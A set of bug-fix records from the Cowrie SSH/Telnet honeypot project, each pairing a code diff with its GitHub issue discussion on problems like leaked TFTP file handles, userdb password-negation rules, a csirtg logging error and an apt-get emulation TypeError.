I have seen the behavior too, though in my case Cowrie was running in a Docker container and connecting from outside the container produced the above ^M when pressing enter, but connecting from inside the container behaved correctly. When connecting from outside I was not specifying a port to the Telnet client, but when inside the container I did because Cowrie was listening on port 2223. I have just verified that I see the same behavior as you when connecting to that system with and without specifying a port. This issue has to do with the way the Telnet client negotiates the echo, linemode, and suppress go ahead (SGA) options and the character it the client sends when pressing enter. When those three options are negotiated correctly, the client switches to character mode and sends a carriage return when enter is pressed. If it is still in linemode, the client sends a newline character instead. I do not know why the Telnet client behaves differently when a port is specified, but it is possible to get better behavior by refusing to enable SGA and linemode when authenticating. I will submit a pull request with that change shortly.
2017-01-20T20:37:23
cowrie/cowrie
439
cowrie__cowrie-439
[ "367" ]
e2033c36f3ba94b4e493d9d1718c0279eba378c0
diff --git a/cowrie/commands/tftp.py b/cowrie/commands/tftp.py --- a/cowrie/commands/tftp.py +++ b/cowrie/commands/tftp.py @@ -48,7 +48,6 @@ def makeTftpRetrieval(self): """ """ progresshook = Progress(self).progresshook - tclient = tftpy.TftpClient(self.hostname, int(self.port)) cfg = self.protocol.cfg if cfg.has_option('honeypot', 'download_limit_size'): @@ -63,51 +62,52 @@ def makeTftpRetrieval(self): re.sub('[^A-Za-z0-9]', '_', self.file_to_get)) self.safeoutfile = os.path.join(self.download_path, tmp_fname) - try: - tclient.download(self.file_to_get, self.safeoutfile, progresshook) - self.file_to_get = self.fs.resolve_path(self.file_to_get, self.protocol.cwd) - self.fs.mkfile(self.file_to_get, 0, 0, tclient.context.metrics.bytes, 33188) - self.fs.update_realfile(self.fs.getfile(self.file_to_get), self.safeoutfile) - - if os.path.exists(self.safeoutfile): - - if os.path.getsize(self.safeoutfile) == 0: - os.remove(self.safeoutfile) - self.safeoutfile = None - return - - with open(self.safeoutfile, 'rb') as f: - shasum = hashlib.sha256(f.read()).hexdigest() - hash_path = os.path.join(self.download_path, shasum) - - # If we have content already, delete temp file - if not os.path.exists(hash_path): - os.rename(self.safeoutfile, hash_path) - else: - os.remove(self.safeoutfile) - log.msg("Not storing duplicate content " + shasum) - - log.msg(eventid='cowrie.session.file_download', - format='Downloaded tftpFile (%(url)s) with SHA-256 %(shasum)s to %(outfile)s', - url=self.file_to_get, - outfile=hash_path, - shasum=shasum) - - # Link friendly name to hash - os.symlink(shasum, self.safeoutfile) - - # Update the honeyfs to point to downloaded file - f = self.fs.getfile(self.file_to_get) - f[A_REALFILE] = hash_path - - except tftpy.TftpException, err: - if os.path.exists(self.safeoutfile): - if os.path.getsize(self.safeoutfile) == 0: - os.remove(self.safeoutfile) - return + with tftpy.TftpClient(self.hostname, int(self.port)) as tclient: + try: + tclient.download(self.file_to_get, self.safeoutfile, progresshook) + self.file_to_get = self.fs.resolve_path(self.file_to_get, self.protocol.cwd) + if hasattr(tclient.context, 'metrics'): + self.fs.mkfile(self.file_to_get, 0, 0, tclient.context.metrics.bytes, 33188) + else: + self.fs.mkfile(self.file_to_get, 0, 0, 0, 33188) + self.fs.update_realfile(self.fs.getfile(self.file_to_get), self.safeoutfile) + except tftpy.TftpException, err: + pass + + if os.path.exists(self.safeoutfile): + + if os.path.getsize(self.safeoutfile) == 0: + os.remove(self.safeoutfile) + self.safeoutfile = None + return + + with open(self.safeoutfile, 'rb') as f: + shasum = hashlib.sha256(f.read()).hexdigest() + hash_path = os.path.join(self.download_path, shasum) + + # If we have content already, delete temp file + if not os.path.exists(hash_path): + os.rename(self.safeoutfile, hash_path) + else: + os.remove(self.safeoutfile) + log.msg("Not storing duplicate content " + shasum) + + url = 'tftp://%s/%s' % (self.hostname, self.file_to_get.strip('/')) + + log.msg(eventid='cowrie.session.file_download', + format='Downloaded tftpFile (%(url)s) with SHA-256 %(shasum)s to %(outfile)s', + url=url, + outfile=hash_path, + shasum=shasum) + + # Link friendly name to hash + os.symlink(shasum, self.safeoutfile) + + # Update the honeyfs to point to downloaded file + f = self.fs.getfile(self.file_to_get) + f[A_REALFILE] = hash_path + - except KeyboardInterrupt: - pass def start(self):
Could not accept new connection (EMFILE) Today, I've seen the following messages on my honeypots: ``` 2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE) 2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE) 2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE) 2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE) 2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE) 2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE) 2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE) 2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE) 2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE) ``` I'm not 100% sure that it was caused by original cowrie, since I have some patches in place. So, first of all, I'll be appreciated if you guys check your instances and tell me if you ever experienced such errors. Different honeypots got this error both with Telnet and SSH. One honeypot even has a traceback: ``` 2016-12-01 08:41:36+0300 [-] Unhandled error in Deferred: 2016-12-01 08:41:36+0300 [-] Unhandled Error Traceback (most recent call last): File "/usr/local/lib/python2.7/site-packages/twisted/internet/base.py", line 1079, in connectionFailed self.factory.clientConnectionFailed(self, reason) File "/usr/local/lib/python2.7/site-packages/twisted/web/client.py", line 457, in clientConnectionFailed self.deferred.errback(reason) File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 434, in errback self._startRunCallbacks(fail) File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 501, in _startRunCallbacks self._runCallbacks() --- <exception caught here> --- File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 588, in _runCallbacks current.result = callback(current.result, *args, **kw) File "/home/cowrie/cowrie/cowrie/commands/wget.py", line 233, in error self.exit() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit self.protocol.cmdstack[-1].resume() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 338, in resume self.runCommand() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 330, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs']) File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 335, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 192, in call_command obj.start() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 94, in start self.exit() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit self.protocol.cmdstack[-1].resume() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 338, in resume self.runCommand() self.factory.clientConnectionFailed(self, reason) File "/usr/local/lib/python2.7/site-packages/twisted/web/client.py", line 457, in clientConnectionFailed self.deferred.errback(reason) File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 434, in errback self._startRunCallbacks(fail) File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 501, in _startRunCallbacks self._runCallbacks() --- <exception caught here> --- File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 588, in _runCallbacks current.result = callback(current.result, *args, **kw) File "/home/cowrie/cowrie/cowrie/commands/wget.py", line 233, in error self.exit() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit self.protocol.cmdstack[-1].resume() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 338, in resume self.runCommand() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 330, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs']) File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 335, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 192, in call_command obj.start() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 94, in start self.exit() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit self.protocol.cmdstack[-1].resume() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 338, in resume self.runCommand() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 330, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs']) File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 335, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 192, in call_command obj.start() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 94, in start self.exit() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit self.protocol.cmdstack[-1].resume() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 338, in resume self.runCommand() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 330, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs']) File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 335, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 192, in call_command obj.start() File "/home/cowrie/cowrie/cowrie/commands/tftp.py", line 146, in start self.exit() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit self.protocol.cmdstack[-1].resume() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 337, in resume self.protocol.setInsertMode() File "/usr/local/lib/python2.7/site-packages/twisted/conch/recvline.py", line 173, in setInsertMode self.terminal.setModes([insults.modes.IRM]) File "/usr/local/lib/python2.7/site-packages/twisted/conch/insults/insults.py", line 628, in setModes self.write('\x1b[%sh' % (';'.join(map(str, modes)),)) File "/home/cowrie/cowrie/cowrie/insults/insults.py", line 92, in write self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs']) File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 335, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 192, in call_command obj.start() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 94, in start self.exit() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit self.protocol.cmdstack[-1].resume() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 338, in resume self.runCommand() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 330, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs']) File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 335, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 192, in call_command obj.start() File "/home/cowrie/cowrie/cowrie/commands/tftp.py", line 146, in start self.exit() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit self.protocol.cmdstack[-1].resume() File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 337, in resume self.protocol.setInsertMode() File "/usr/local/lib/python2.7/site-packages/twisted/conch/recvline.py", line 173, in setInsertMode self.terminal.setModes([insults.modes.IRM]) File "/usr/local/lib/python2.7/site-packages/twisted/conch/insults/insults.py", line 628, in setModes self.write('\x1b[%sh' % (';'.join(map(str, modes)),)) File "/home/cowrie/cowrie/cowrie/insults/insults.py", line 92, in write ttylog.TYPE_OUTPUT, time.time(), bytes) File "/home/cowrie/cowrie/cowrie/core/ttylog.py", line 39, in ttylog_write with open(logfile, 'ab') as f: exceptions.IOError: [Errno 24] Too many open files: 'log/tty/20161201-074642-None-3340i.log' ```
Could be that the server is running out of file descriptors. The "exceptions.IOError: [Errno 24] Too many open files: 'log/tty/20161201-074642-None-3340i.log'" provides another hint that it was unable to write new file. Increase maximum number of file descriptor of the server might temporarily solves this problem. In my own cowrie instance, I sometimes noticed that connections (about 2000 of them) tied to cowrie process were left hanging in CLOSE_WAIT status for a long time. I had to restart cowrie process to get rid of them. I've just checked the open descriptors and looks like cowrie doesn't drop connection under some circumstances, because some descriptors (about 50% of all descriptors) are open for more than a day now: lrwx------ 1 cowrie cowrie 64 Dec 4 11:39 91 -> socket:[1259944917] l-wx------ 1 cowrie cowrie 64 Dec 4 11:39 92 -> /home/cowrie/cowrie/dl/20161202224203_tftp1_sh lrwx------ 1 cowrie cowrie 64 Dec 4 11:39 93 -> socket:[1247497450] l-wx------ 1 cowrie cowrie 64 Dec 4 11:39 94 -> /home/cowrie/cowrie/dl/20161202205345_tftp1_sh lrwx------ 1 cowrie cowrie 64 Dec 4 11:39 95 -> socket:[1247501472] l-wx------ 1 cowrie cowrie 64 Dec 4 11:39 96 -> /home/cowrie/cowrie/dl/20161202205410_tftp2_sh lrwx------ 1 cowrie cowrie 64 Dec 4 11:39 97 -> socket:[1248238996] l-wx------ 1 cowrie cowrie 64 Dec 4 11:39 98 -> /home/cowrie/cowrie/dl/20161202224228_tftp2_sh > I had to restart cowrie process to get rid of them. Probably, it would be nice to schedule a daily restart to prevent such things. There is a timeout for each session, and if sessions are hanging, the session timeout should be fixed first.. Also it appears the files stay open that are downloaded (_sh files). Those should have been closed. I've reproduced the issue. 2-3 days of uptime is enough to get this error on almost all of my honeypots. I could confirm that the problem related only to tftp-downloaded files. Probably, the client doesn't close the file handle for some reasons. I'll try to track the problem... Also, I have a couple of hang (?) connections. During stopping process, cowrie logged the following: 2016-12-07 07:56:00+0300 [HoneyPotSSHTransport,505,attackers_ip] avatar admin logging out 2016-12-07 07:56:00+0300 [HoneyPotSSHTransport,505,attackers_ip] connection lost 2016-12-07 07:56:00+0300 [HoneyPotSSHTransport,505,attackers_ip] Connection lost after 66706 seconds 2016-12-07 07:56:01+0300 [HoneyPotSSHTransport,144,attackers_ip] avatar admin logging out 2016-12-07 07:56:01+0300 [HoneyPotSSHTransport,144,attackers_ip] connection lost 2016-12-07 07:56:01+0300 [HoneyPotSSHTransport,144,attackers_ip] Connection lost after 126256 seconds 2016-12-07 07:56:01+0300 [HoneyPotSSHTransport,504,attackers_ip] avatar admin logging out 2016-12-07 07:56:01+0300 [HoneyPotSSHTransport,504,attackers_ip] connection lost 2016-12-07 07:56:01+0300 [HoneyPotSSHTransport,504,attackers_ip] Connection lost after 67007 seconds I've checked this sessions - it was direct-tcp forward requests. Probably connection timeout doesn't affect this requests, does it? Regarding the tftp_sh file descriptor being left open, I believe it was due to the connection from either side was not terminated properly. As of now, I currently observes this on my cowrie pot : ``` 2016-12-13T16:49:49+0000 [twisted.internet.defer#critical] Unhandled error in Deferred: 2016-12-13T16:49:49+0000 [twisted.internet.defer#critical] Traceback (most recent call last): Failure: twisted.internet.error.ConnectionLost: Connection to the other side was lost in a non-clean fashion. 2016-12-13T16:49:49+0000 [twisted.internet.defer#critical] Unhandled error in Deferred: 2016-12-13T16:49:49+0000 [twisted.internet.defer#critical] Traceback (most recent call last): Failure: twisted.internet.error.ConnectionLost: Connection to the other side was lost in a non-clean fashion. 2016-12-13T16:49:49+0000 [CowrieTelnetTransport,3522,<removed>] Closing TTY Log: log/tty/20161213-164935-None-3522i.log after 13 seconds 2016-12-13T16:49:49+0000 [CowrieTelnetTransport,3522,<removed>] honeypot terminal protocol connection lost [Failure instance: Traceback (failure with no frames): <class 'twisted. internet.error.ConnectionLost'>: Connection to the other side was lost in a non-clean fashion. ``` The TFTP connections are left hanging open. These could contribute to the increase of open files over the time : ``` # netstat -uanlp Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 0.0.0.0:54921 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:39318 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:44057 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:55712 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:46115 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:48170 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:55850 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:44974 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:56117 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:57149 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:53186 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:46918 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:51786 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:37326 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:36439 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:52567 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:47191 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:45022 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:33384 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:53999 0.0.0.0:* 24010/python2 udp 0 0 0.0.0.0:45940 0.0.0.0:* 24010/python2 ``` But, the files the tftp files that are downloaded seems to be closed accordingly. The cause of the described problem is file handle leakage in tftpy when it raises `TftpTimeout` in `TftpContextClientDownload`. The quick fix will be to patch `TftpContextClientDownload` class in cowrie-env/lib/python2.7/site-packages/tftpy/TftpContexts.py in order to close file handle before raising the exception: ``` def start(self): """Initiate the download.""" log.info("Sending tftp download request to %s" % self.host) log.info(" filename -> %s" % self.file_to_transfer) log.info(" options -> %s" % self.options) self.metrics.start_time = time.time() log.debug("Set metrics.start_time to %s", self.metrics.start_time) # FIXME: put this in a sendRRQ method? pkt = TftpPacketRRQ() pkt.filename = self.file_to_transfer pkt.mode = "octet" # FIXME - shouldn't hardcode this pkt.options = self.options self.sock.sendto(pkt.encode().buffer, (self.host, self.port)) self.next_block = 1 self.last_pkt = pkt self.state = TftpStateSentRRQ(self) while self.state: try: log.debug("State is %s", self.state) self.cycle() except TftpTimeout, err: log.error(str(err)) self.retry_count += 1 if self.retry_count >= TIMEOUT_RETRIES: log.debug("hit max retries, giving up") # begining of the patch if self.fileobj and not self.fileobj.closed: self.fileobj.close() # end of the patch raise else: log.warn("resending last packet") self.state.resendLast() ```
2017-02-02T07:45:09
cowrie/cowrie
638
cowrie__cowrie-638
[ "615" ]
5083bc4b24da683d9c4137945372cb3b06df1fd0
diff --git a/cowrie/output/csirtg.py b/cowrie/output/csirtg.py --- a/cowrie/output/csirtg.py +++ b/cowrie/output/csirtg.py @@ -7,8 +7,7 @@ from datetime import datetime import logging import os - -logger = logging.getLogger(__name__) +from twisted.python import log USERNAME = os.environ.get('CSIRTG_USER') FEED = os.environ.get('CSIRTG_FEED') @@ -42,20 +41,17 @@ def write(self, e): system = e['system'] if system not in ['cowrie.ssh.factory.CowrieSSHFactory', 'cowrie.telnet.transport.HoneyPotTelnetFactory']: - logger.debug('skipping {}'.format(system)) return today = str(datetime.now().date()) if not self.context.get(today): - logger.debug('resetting context for %s' % today) self.context = {} self.context[today] = set() key = ','.join([peerIP, system]) if key in self.context[today]: - logger.debug('skipping {}'.format(key)) return self.context[today].add(key) @@ -79,5 +75,5 @@ def write(self, e): } ret = Indicator(self.client, i).submit() - logger.info('logged to csirtg %s ' % ret['indicator']['location']) + log.msg('logged to csirtg %s ' % ret['location'])
csirtg plugin no longer working I'm not sure exactly when this happened, but just happend to check the logs today, and noticed the csirtg plugin has some errors. ``` 2017-11-02T17:05:41-0400 [cowrie.telnet.transport.HoneyPotTelnetFactory] New connection: 45.32.221.61:59776 (x.x.x.x:23) [session: TT0] 2017-11-02T17:05:41-0400 [twisted.logger._observer#critical] Temporarily disabling observer LegacyLogObserverWrapper(<bound method Output.emit of <cowrie.output.csirtg.Output object at 0x7f3a5ce9bb50>>) due to exception: [Failure instance: Traceback: <type 'exceptions.TypeError'>: string indices must be integers /home/cowrie/cowrie/cowrie/telnet/transport.py:218:connectionMade /usr/local/lib/python2.7/dist-packages/twisted/python/threadable.py:53:sync /usr/local/lib/python2.7/dist-packages/twisted/python/log.py:286:msg /usr/local/lib/python2.7/dist-packages/twisted/logger/_legacy.py:154:publishToNewObserver --- <exception caught here> --- /usr/local/lib/python2.7/dist-packages/twisted/logger/_observer.py:131:__call__ /usr/local/lib/python2.7/dist-packages/twisted/logger/_legacy.py:93:__call__ /home/cowrie/cowrie/cowrie/core/output.py:190:emit /home/cowrie/cowrie/cowrie/output/csirtg.py:82:write ] Traceback (most recent call last): File "/home/cowrie/cowrie/cowrie/telnet/transport.py", line 218, in connectionMade session=self.transportId, sessionno='T'+str(sessionno)) File "/usr/local/lib/python2.7/dist-packages/twisted/python/threadable.py", line 53, in sync return function(self, *args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/twisted/python/log.py", line 286, in msg _publishNew(self._publishPublisher, actualEventDict, textFromEventDict) File "/usr/local/lib/python2.7/dist-packages/twisted/logger/_legacy.py", line 154, in publishToNewObserver observer(eventDict) --- <exception caught here> --- File "/usr/local/lib/python2.7/dist-packages/twisted/logger/_observer.py", line 131, in __call__ observer(event) File "/usr/local/lib/python2.7/dist-packages/twisted/logger/_legacy.py", line 93, in __call__ self.legacyObserver(event) File "/home/cowrie/cowrie/cowrie/core/output.py", line 190, in emit self.write(ev) File "/home/cowrie/cowrie/cowrie/output/csirtg.py", line 82, in write logger.info('logged to csirtg %s ' % ret['indicator']['location']) exceptions.TypeError: string indices must be integers ```
One recent change is that I merge someone else's change to the connection message, that adds the protocol support (protocol=telnet or protocol=ssh). Maybe that caused it? i'll take a look at this.. also, fwiw this kinda just looks like a logging error, not a submission error..
2017-11-28T17:00:32
cowrie/cowrie
763
cowrie__cowrie-763
[ "762" ]
6f2b3f8438064927a5e54fde0eb8b4a74b4d05c4
diff --git a/cowrie/core/auth.py b/cowrie/core/auth.py --- a/cowrie/core/auth.py +++ b/cowrie/core/auth.py @@ -7,6 +7,7 @@ from __future__ import division, absolute_import +import re import json from os import path from random import randint @@ -21,7 +22,7 @@ class UserDB(object): """ def __init__(self): - self.userdb = [] + self.userdb = {} self.userdb_file = '%s/userdb.txt' % CONFIG.get('honeypot', 'data_path') self.load() @@ -44,55 +45,50 @@ def load(self): if line.startswith(b'#'): continue - (login, uid, passwd) = line.split(b':', 2) + login, passwd = re.split(br':\w+:', line, 1) + self.adduser(login, passwd) - self.userdb.append((login, passwd)) + def checklogin(self, thelogin, thepasswd, src_ip='0.0.0.0'): + for credentials, policy in self.userdb.items(): + login, passwd = credentials - def save(self): - """ - save the user db - """ + if self.match_rule(login, thelogin): + if self.match_rule(passwd, thepasswd): + return policy - # Note: this is subject to races between cowrie instances, but hey ... - with open(self.userdb_file, 'w') as f: - for (login, passwd) in self.userdb: - f.write('%s:x:%s\n' % (login, passwd)) + return False - def checklogin(self, thelogin, thepasswd, src_ip='0.0.0.0'): - """ - check entered username/password against database - note that it allows multiple passwords for a single username - it also knows wildcard '*' for any username or password - prepend password with ! to explicitly deny it. Denials must come before wildcards - """ - for (login, passwd) in self.userdb: - # Explicitly fail on !password - if login == thelogin and passwd == b'!' + thepasswd: - return False - if login in (thelogin, b'*') and passwd in (thepasswd, b'*'): - return True - return False + def match_rule(self, rule, input): + if type(rule) is bytes: + return rule in [b'*', input] + else: + return bool(rule.search(input)) - def user_password_exists(self, thelogin, thepasswd): + def re_or_str(self, rule): """ + Convert a /.../ type rule to a regex, otherwise return the string as-is """ - for (login, passwd) in self.userdb: - if login == thelogin and passwd == thepasswd: - return True - return False + res = re.match(br'/(.+)/(i)?$', rule) + if res: + return re.compile(res.group(1), re.IGNORECASE if res.group(2) else 0) + + return rule def adduser(self, login, passwd): - """ - """ - if self.user_password_exists(login, passwd): - return - self.userdb.append((login, passwd)) - self.save() + login = self.re_or_str(login) + + if passwd.startswith(b'!'): + policy = False + passwd = passwd[1:] + else: + policy = True + passwd = self.re_or_str(passwd) + self.userdb[(login, passwd)] = policy class AuthRandom(object):
Implement regular expressions in userdb.txt The file that contains the combinations of usernames and passwords that Cowrie accepts from the attackers (`data/userdb.txt`) currently handles 3 special characters - `#`, which means a comment till the end of the line, `!`, which means negation, and `*`, which means "anything" (in either the username or the password field). Would it be possible to allow any regular expression instead of the special characters '!' and '*'? I've seen attackers use variations of the password "honeypot" to determine that they are dealing with a honeypot and refuse to conduct their usual attack. Examples include "Honeypot321" (309 times), "honeypot" (6 times), and "nologinissahoneypotlmao" (once) over a 17-month period. I could, of course, explicitly block just these 3 passwords, but I'd like to disallow any password with the word "honeypot" (case-insensitive) in it.
Sure. We take pull requests :) Perhaps @desaster could help? He wrote the original authentication module and then improved it to accept a wildcard as the username. I think you can do it if you give it a try.
2018-05-24T14:50:55
cowrie/cowrie
802
cowrie__cowrie-802
[ "797" ]
f777eb7e4799df3d029c49e7e8285ea4a41f73e0
diff --git a/cowrie/core/auth.py b/cowrie/core/auth.py --- a/cowrie/core/auth.py +++ b/cowrie/core/auth.py @@ -11,6 +11,7 @@ import json from os import path from random import randint +from collections import OrderedDict from twisted.python import log @@ -22,7 +23,7 @@ class UserDB(object): """ def __init__(self): - self.userdb = {} + self.userdb = OrderedDict() self.userdb_file = '{}/userdb.txt'.format(CONFIG.get('honeypot', 'data_path')) self.load()
adding root:x:!password to userdb.txt doesn't exclude root/password as valid credentials Fresh install. I tried to exclude 'password' or 'abc123' from valid passwords for the user root Now file looks like ``` root:x:!root root:x:!123456 root:x:!password root:x:* ``` Retarted cowrie, but no way to deny login with root/password credentials Maybe, some sort of problem with new regexp checking?
That used to work, maybe that stopped working with the new regex patch indeed. Hello @supriyo-biswas In your patch https://github.com/micheloosterhof/cowrie/pull/763 we lost the ability to negate passwords starting with '!'. Any ideas on how to do this with regex? Yep, experiencing the same issue here. I looked through the file and nothing stood out to me. If this doesn't get resolved I'll have more time to look at it tomorrow night.
2018-07-06T03:45:52
cowrie/cowrie
818
cowrie__cowrie-818
[ "817" ]
d18cc000333598ca83205130186e03563183ed7b
diff --git a/cowrie/commands/apt.py b/cowrie/commands/apt.py --- a/cowrie/commands/apt.py +++ b/cowrie/commands/apt.py @@ -120,7 +120,7 @@ def do_install(self, *args): packages = {} for y in [re.sub('[^A-Za-z0-9]', '', x) for x in self.args[1:]]: packages[y] = { - 'version': '{0}.{1}-{2}'.format(random.choice(0, 1), random.randint(1, 40), random.randint(1, 10)), + 'version': '{0}.{1}-{2}'.format(random.choice([0, 1]), random.randint(1, 40), random.randint(1, 10)), 'size': random.randint(100, 900) } totalsize = sum([packages[x]['size'] for x in packages])
TypeError in command "apt-get install" **Describe the bug** When using the command "apt-get install XY" while logged in per SSH in the cowrie honeypot, nothing happens. If you look into the logs, the requested software couldn't be installed but a TypeError is thrown: ```Traceback (most recent call last): File "/home/cowrie/github/cowrie/cowrie/shell/protocol.py", line 359, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/github/cowrie/cowrie/shell/protocol.py", line 216, in call_command obj.start() File "/home/cowrie/github/cowrie/cowrie/commands/apt.py", line 36, in start self.do_install() File "/home/cowrie/github/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/internet/defer.py", line 1532, in unwindGenerator return _inlineCallbacks(None, gen, Deferred()) --- <exception caught here> --- File "/home/cowrie/github/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/internet/defer.py", line 1386, in _inlineCallbacks result = g.send(result) File "/home/cowrie/github/cowrie/cowrie/commands/apt.py", line 123, in do_install 'version': '{0}.{1}-{2}'.format(random.choice(0, 1), random.randint(1, 40), random.randint(1, 10)), exceptions.TypeError: choice() takes exactly 2 arguments (3 given) ``` I investigated the source and saw what is actually wrong: ``` 'version': '{0}.{1}-{2}'.format(random.choice(0, 1), random.randint(1, 40), random.randint(1, 10)), ``` in which `random.choice(0, 1)` requires a sequence, so `random.choice([0, 1])` should work. **To Reproduce** Steps to reproduce the behavior: 1. Log in a cowrie honeypot per ssh: ssh -p 2222 root@honeypot 2. Try "sudo apt-get install vim" 3. See the error in the cowrie logs on your machine: cowrie/logs/cowrie.log **Expected behavior** See some common apt-get messages, like "Reading package lists... Done\n", e.g. simulating to the attacker the command worked. **Server (please complete the following information):** - OS: CentOS 7, x86_64 - Python: Python 2.7.5 and Python 3.6.5 **Additional context** -
2018-07-16T14:02:13
cowrie/cowrie
884
cowrie__cowrie-884
[ "883" ]
cd480394dad66ccdec4d03d92c0931f49f36b55b
diff --git a/src/cowrie/shell/honeypot.py b/src/cowrie/shell/honeypot.py --- a/src/cowrie/shell/honeypot.py +++ b/src/cowrie/shell/honeypot.py @@ -32,15 +32,21 @@ def __init__(self, protocol, interactive=True): def lineReceived(self, line): log.msg(eventid='cowrie.command.input', input=line, format='CMD: %(input)s') - self.lexer = shlex.shlex(instream=line, punctuation_chars=True) + self.lexer = shlex.shlex(instream=line, punctuation_chars=True, posix=True) # Add these special characters that are not in the default lexer - self.lexer.wordchars += '@%{}=$:+^' + self.lexer.wordchars += '@%{}=$:+^,' tokens = [] while True: try: tok = self.lexer.get_token() # log.msg("tok: %s" % (repr(tok))) + if tok == self.lexer.eof: + if tokens: + self.cmdpending.append((tokens)) + tokens = [] + break + # Ignore parentheses tok_len = len(tok) tok = tok.strip('(') @@ -48,13 +54,8 @@ def lineReceived(self, line): if len(tok) != tok_len and tok == '': continue - if tok == self.lexer.eof: - if tokens: - self.cmdpending.append((tokens)) - tokens = [] - break # For now, treat && and || same as ;, just execute without checking return code - elif tok == '&&' or tok == '||': + if tok == '&&' or tok == '||': if tokens: self.cmdpending.append((tokens)) tokens = [] diff --git a/src/cowrie/shell/shlex.py b/src/cowrie/shell/shlex.py --- a/src/cowrie/shell/shlex.py +++ b/src/cowrie/shell/shlex.py @@ 